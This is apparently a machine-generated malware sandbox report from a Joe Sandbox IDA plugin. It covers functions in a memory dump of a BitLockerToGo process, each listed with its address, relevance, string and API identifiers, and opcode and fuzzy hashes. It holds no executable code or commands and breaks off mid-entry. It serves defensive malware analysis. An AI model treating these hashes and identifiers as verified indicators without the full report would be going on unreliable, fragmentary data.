                                                                                                                                                                                                                                                  • Opcode ID: de2581a352b86ae9d5c324ef9c19ca3ff0aaf84392a14f6d0ba946c94a3cc0d0
                                                                                                                                                                                                                                                  • Instruction ID: 9a1f0ff0af3033ba10ddb486e2f73cbfe75a3563cbb2abcdb3e67fc175715183
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de2581a352b86ae9d5c324ef9c19ca3ff0aaf84392a14f6d0ba946c94a3cc0d0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86328A35618341CFD705DF28E8A062EB7F2FB8A316F19886EE58587352D735E814CB86
                                                                                                                                                                                                                                                  Function 0044A020 Relevance: 2.0, Strings: 1, Instructions: 706COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  • API String ID: 0-900979605
                                                                                                                                                                                                                                                  • Opcode ID: fe9ba813817b9a5358a5f6e92db99d272be5c51ba910f241fa5753d44cbc2beb
                                                                                                                                                                                                                                                  • Instruction ID: 87c85b23b0cf3adcaeeebb6c08eecae87561014b8ee6002672246bbb69686c43
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe9ba813817b9a5358a5f6e92db99d272be5c51ba910f241fa5753d44cbc2beb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D229A35618341CFD704DF28E8A062EB7F2EF8A316F19886DE58587352D735E914CB86
                                                                                                                                                                                                                                                  Function 00425D20 Relevance: 1.7, APIs: 1, Instructions: 246comCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00425D49
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                                                                                                  • Opcode ID: f479681205fb4a82668b0cbb6bc0b8c77c8bbbdd25ef556124b9ea1b5588b47b
                                                                                                                                                                                                                                                  • Instruction ID: d722b1d9fa664ee7f67fb2e1c565ab17e4061631acc196db9e78faf9d1913499
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f479681205fb4a82668b0cbb6bc0b8c77c8bbbdd25ef556124b9ea1b5588b47b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051CCB17006249BDB209B24DC86B7773A4EF85364F498519F986CB390E378E940C76A
                                                                                                                                                                                                                                                  Function 00426BDA Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  • Opcode ID: e06a3114ba87eb3345779032b83372c1056b52bf653a027763a918f9af6565c7
                                                                                                                                                                                                                                                  • Instruction ID: 813e4190459b9ad96d39470959eb46b59385b9dfe2a0bb01f1de856a6b80e78f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e06a3114ba87eb3345779032b83372c1056b52bf653a027763a918f9af6565c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2E1E1366083618FC715DF18E89062AB3E2FB85315F8A4A7DE8D5973A1D334EC50CB95
                                                                                                                                                                                                                                                  Function 0044A570 Relevance: 1.6, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0$
                                                                                                                                                                                                                                                  • API String ID: 0-900979605
                                                                                                                                                                                                                                                  • Opcode ID: 96963472b0419f1ed306c3774360d0b9a615f2088abefc5575c7c0e0863a98c4
                                                                                                                                                                                                                                                  • Instruction ID: fe9f7505b120b8510fd930da977d90df6ac78d7e68c833623650ff652ed0af0e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96963472b0419f1ed306c3774360d0b9a615f2088abefc5575c7c0e0863a98c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1B18835608340DFD704DF28E99462EBBF2EB8A306F19882EE4C587352D335E914CB96
                                                                                                                                                                                                                                                  Function 0042D720 Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: sp
                                                                                                                                                                                                                                                  • API String ID: 0-2933045414
                                                                                                                                                                                                                                                  • Opcode ID: eee93728a58d101f068dc481be77043abd0e2faa75ecdf4b409b62bbcce439d6
                                                                                                                                                                                                                                                  • Instruction ID: 347072c68ee8a1732f5a388f528297c9a6c9863354b148120d989bce443ab34c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eee93728a58d101f068dc481be77043abd0e2faa75ecdf4b409b62bbcce439d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD179B45083918BE720DF25D840B5FBBF5BB85344F500D2EE9D89B282DB78D905CB9A
                                                                                                                                                                                                                                                  Function 00449630 Relevance: 1.6, Strings: 1, Instructions: 378COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: P
                                                                                                                                                                                                                                                  • API String ID: 0-3110715001
                                                                                                                                                                                                                                                  • Opcode ID: 3595623217bd3bc92218b7f07ed90a133e11e9b405b549f7fec5c0e931833e69
                                                                                                                                                                                                                                                  • Instruction ID: 39f73d0e8e91fda4240b4028a78debbe09375fcbe514849d58126344050a1a6d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3595623217bd3bc92218b7f07ed90a133e11e9b405b549f7fec5c0e931833e69
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DD1143290C3608FE725CE18949071FB6E1EB85718F168A3DE8A5AB391C779DC06D7C6
                                                                                                                                                                                                                                                  Function 004240A0 Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: =
                                                                                                                                                                                                                                                  • API String ID: 0-193990712
                                                                                                                                                                                                                                                  • Opcode ID: 6d341293ef8b09646fe48e3e793b6f09ec501e981a369c9a117e397547ffaf7c
                                                                                                                                                                                                                                                  • Instruction ID: 33d73758fe75bdb39d03ba2fe92449fc2741a593119b4794d6c6e2916e374e07
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d341293ef8b09646fe48e3e793b6f09ec501e981a369c9a117e397547ffaf7c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FA1CFB16042108BC714DF18E892A3BB7F1EFD1364F58865DE8868B391E339DC45CB6A
                                                                                                                                                                                                                                                  Function 00445C60 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  • Opcode ID: 4798ba431ab34511db620368d7bfe469c0ce7d93b936ab9c0025d4aca09f472a
                                                                                                                                                                                                                                                  • Instruction ID: 30c381edac09ffaab40e9872e2b9a267c78050e63f1e6169e3d687cdfce8eae4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4798ba431ab34511db620368d7bfe469c0ce7d93b936ab9c0025d4aca09f472a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6161EFB0A087019BEB14DF14C884A2BB7E2EF85304F64892EE4D5873A2D739DC11CB5A
                                                                                                                                                                                                                                                  Function 004448D0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4;:y
                                                                                                                                                                                                                                                  • API String ID: 0-2051255674
                                                                                                                                                                                                                                                  • Opcode ID: 98086734d9a3259f471fd55337c928464a5e63e59dd644557259f403bac198b6
                                                                                                                                                                                                                                                  • Instruction ID: e781004b138475c9eed985ad9fec0c327da5426488562facc338316864731463
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98086734d9a3259f471fd55337c928464a5e63e59dd644557259f403bac198b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D55180756083019BE704DF28D890A2FBBE6EBC5315F14882EE88597361D339DC54CB6A
                                                                                                                                                                                                                                                  Function 00448BA0 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                                                                                                  • Opcode ID: b7932ec4a041e87f9b92b456bfb156f8597494c6d60a46021b5423e405080e2f
                                                                                                                                                                                                                                                  • Instruction ID: 9b08734fe48e32431410e1ce68a9479d784b898f2cfa83044d6bab1dda831787
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7932ec4a041e87f9b92b456bfb156f8597494c6d60a46021b5423e405080e2f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7512771609300ABE7149A18DC90B2FB7E1EF95715F148A2DE9D5573D1CB39DC0087AA
                                                                                                                                                                                                                                                  Function 00444B10 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                                  • API String ID: 0-3116432788
                                                                                                                                                                                                                                                  • Opcode ID: 07a3029c9f2c1e474468fab06dc3aed8a4433feabc96eb799fd61ed9ee838327
                                                                                                                                                                                                                                                  • Instruction ID: 0635231909715c318ffdadaee8fc8a63bd4bc7359a691521a8f6f89ce1d81991
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07a3029c9f2c1e474468fab06dc3aed8a4433feabc96eb799fd61ed9ee838327
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6851B0746092409BE714DB55E980B2BB7E6EFC5704F19882EE8C987352D739EC10CB6A
                                                                                                                                                                                                                                                  Function 00420CE9 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $%
                                                                                                                                                                                                                                                  • API String ID: 0-4214564638
                                                                                                                                                                                                                                                  • Opcode ID: 66a02fc15c09f8371ce107ca58ced43fe82fa44e3e165eba7ea05b002aaa382e
                                                                                                                                                                                                                                                  • Instruction ID: ec1bccfda47f7595bee8eb1b737ffa0cc694392b6672ac4e172fe49f4c450ab1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66a02fc15c09f8371ce107ca58ced43fe82fa44e3e165eba7ea05b002aaa382e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2731CCB05083109BC710DF18D491A2BBBF1FF96358F449A0DE4D95B3A2E379E940CB9A
                                                                                                                                                                                                                                                  Function 00433FA1 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: >:6"
                                                                                                                                                                                                                                                  • API String ID: 0-1144053849
                                                                                                                                                                                                                                                  • Opcode ID: 4976777060d6235f4b9add8f3674b6d11bbb935eab5f010cbfc7afa09bd17a64
                                                                                                                                                                                                                                                  • Instruction ID: 33178f4afd00e9099759b984be3ac119d6afb0704ddaa93e413734017d0e7d40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4976777060d6235f4b9add8f3674b6d11bbb935eab5f010cbfc7afa09bd17a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64317E70504B818AD3258F3585607F7FFF0AF2B306F54298ED4EA9B293D339A5058B18
                                                                                                                                                                                                                                                  Function 0044B360 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 0651963b11ec495fbef1a023fe6f234247c030a22bb24d56be10e3a9af831a44
                                                                                                                                                                                                                                                  • Instruction ID: 5815b61cf46c545785f8eb0cfc01d82d55d1a866a37f2d059873a76f9c7c5db7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0651963b11ec495fbef1a023fe6f234247c030a22bb24d56be10e3a9af831a44
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B3158705093009BE714DF15D880A2BBBF5FF8A318F14992DE9C897352D339D9048BAA
                                                                                                                                                                                                                                                  Function 00413545 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: df6301ece2f696f048da671d6c4a615d9af494cd0d3e0bd17f31d7bfe1971ca5
                                                                                                                                                                                                                                                  • Instruction ID: 10ca3236c8b0209530b435292193d8e84d69ecfe6dd6fcf3182e2ade1c05c7e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df6301ece2f696f048da671d6c4a615d9af494cd0d3e0bd17f31d7bfe1971ca5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5B18AB4500B009BD3219F25C980B57FBF1EF46B05F04891EE8AA97B52E339F954CB98
                                                                                                                                                                                                                                                  Function 00413F7E Relevance: .3, Instructions: 336COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ed1cdb187d5679581427f5513c755a17fba32a4836aa2768c937e221ba319891
                                                                                                                                                                                                                                                  • Instruction ID: 77dc9a6f90af4d51df16105db384998fe7444c995f7724d6f2eb4fea05ae5f94
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed1cdb187d5679581427f5513c755a17fba32a4836aa2768c937e221ba319891
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39B17DB0600B009FD735CF24C580B67B7F6AF86315F14891ED4AA87A51E778F885CB98
                                                                                                                                                                                                                                                  Function 0041513F Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 27ced31cc5a99183f576a7ce7ac932445af75c7cbb28ab667b14b565cbfb8514
                                                                                                                                                                                                                                                  • Instruction ID: c93bb3055daa1e89e1beb99f5478b3f90827c8e15d0747c282fac1d1b3b418d5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27ced31cc5a99183f576a7ce7ac932445af75c7cbb28ab667b14b565cbfb8514
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 07C15874500B40DBD3218F25C980BA7BBF5EF86705F44891EE8AA97B51E339F854CB68
                                                                                                                                                                                                                                                  Function 0041562A Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0aaf816ecffecd358245f2a9767a204afc7590f17c35775b7bb6b53be753c2a9
                                                                                                                                                                                                                                                  • Instruction ID: abdc3f194c51dfd8672bdfe5dc8b0ca5f49385bfdfad6ad40c24e6642a31a7a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0aaf816ecffecd358245f2a9767a204afc7590f17c35775b7bb6b53be753c2a9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A17B74500B40DBD3219F24C985BA7BBF5EF86704F44881EE4AA97B52D339F854CBA8
                                                                                                                                                                                                                                                  Function 0042DAE0 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 10a658a8ca77d34b23914b2186c888938859642355b1cc8105b6dacda361d470
                                                                                                                                                                                                                                                  • Instruction ID: dfff5f7f45e0ff2777f7841ce8745a549955851dc7403e110e4a6420a11d3be7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10a658a8ca77d34b23914b2186c888938859642355b1cc8105b6dacda361d470
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A641DCB4A08351CBD7209F18D86072BB3F0BF55345F54092EE9C997391EB79DA00CB9A
                                                                                                                                                                                                                                                  Function 00405B70 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a109be02f258a0f0657cd7fbd88b1ac252d557d6b8282bed318273934bb3f543
                                                                                                                                                                                                                                                  • Instruction ID: 784c4ed03ce9f5b6bfeadd6ec7bcb3b9b2d9654288c5f9ff4b15844d770b2129
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a109be02f258a0f0657cd7fbd88b1ac252d557d6b8282bed318273934bb3f543
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E51B1749087009FC714EF18D480917B7A1FF85324F15467EE899AB392D635EC42CF9A
                                                                                                                                                                                                                                                  Function 0044B050 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ff2e519eff1f0c408d1eec6b438ef72d3be564d6fc117286a2d5ebbce68335a0
                                                                                                                                                                                                                                                  • Instruction ID: 33672fd924b6c88aa5416252cb686c4536425a9d7db2c635300dc21f53a4136e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff2e519eff1f0c408d1eec6b438ef72d3be564d6fc117286a2d5ebbce68335a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9741AF34208300ABE7149F14DCA1B2BB7B5EF85755F24882EF98997351D339EC10CBAA
                                                                                                                                                                                                                                                  Function 0044B1E0 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 313e994656a192c72bb580d1226823beb7f871472052ab55eee21b2ff4512a51
                                                                                                                                                                                                                                                  • Instruction ID: afec0c40f8677a382a6608722c47751855c221b068be2805ab4831cbec51dd41
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 313e994656a192c72bb580d1226823beb7f871472052ab55eee21b2ff4512a51
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80419D34208300ABE7149F55D984B2FB7A6FF85715F24882DF98997391D379EC10CBAA
                                                                                                                                                                                                                                                  Function 00404870 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
